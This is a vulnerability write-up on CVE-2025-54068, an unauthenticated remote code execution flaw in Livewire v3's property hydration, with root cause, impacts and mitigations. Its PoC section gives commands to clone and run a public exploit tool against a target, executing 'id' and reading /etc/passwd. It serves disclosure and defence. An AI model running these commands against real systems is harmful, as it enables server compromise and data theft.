CVE-2025-54068 – Livewire Component Property Hydration RCE

Vendor Discription:-

Using server-side rendering, developers can create dynamic, reactive user interfaces with Livewire, a full-stack framework for Laravel. By managing state and events on the backend, it enables you to create interactive features without requiring a lot of JavaScript. Development is quicker and easier to maintain because to Livewire’s seamless integration with Blade templates. It is particularly helpful for developing cutting-edge, responsive web apps with no frontend complexity.

CVE-2025-54068 Description:-

The hydrateForUpdate method in Livewire v3’s Livewire\Mechanisms\HandleComponents\HandleComponents class has an insecure implementation that directly calls the standard hydrate function on untrusted client-side property updates without adequate validation or sanitization checks. This is the root cause of CVE-2025-54068. During the hydration process, which reconstructs server-side component properties from client state on each request, this vulnerability allowed attackers to supply malicious payloads. This allowed specially constructed nested property manipulations or removed properties to get around security measures and cause arbitrary PHP code injection (classified as CWE-94). In particular, the lack of limitations on unsafe property structures allowed attacker-controlled data to be interpreted as executable code in a manner similar to deserialization, regardless of authentication or APP_KEY checksum checking.

Impacts

• Enables unauthenticated remote code execution, allowing full server compromise.​
• Permits reading sensitive files like configuration or user data.​
• Allows attackers to modify application logic or database contents.​
• Facilitates system disruption, website defacement, or service downtime.​
• Serves as a pivot for lateral movement in multi-tenant environments.​

Mitigations

• Upgrade Livewire to version 3.6.4 or later immediately.​
• Audit all Livewire components for vulnerable public configurations.​
• Implement network segmentation to limit exposure.​
• Monitor logs for unusual property update patterns or RCE indicators.​
• Temporarily disable exposed Livewire components if upgrade delayed.

POC

Install the requirements after cloning the repository:

git clone https://github.com/synacktiv/Livepyre.git
cd Livepyre
pip install -r requirements.txt

Next, use the exploit to attack the target. Without needing the APP_KEY, the program will automatically identify the Livewire version, locate accessible snapshots, and try to exploit the vulnerability:

python Livepyre.py -u http://your-ip:8080/ -f system -p "id"

The tool will check for parameters with object types in the snapshot. If found, it will trigger RCE directly. Otherwise, it will attempt to bruteforce the parameters. You can also execute other commands, such as reading /etc/passwd:

python Livepyre.py -u http://your-ip:8080/ -f system -p "cat /etc/passwd"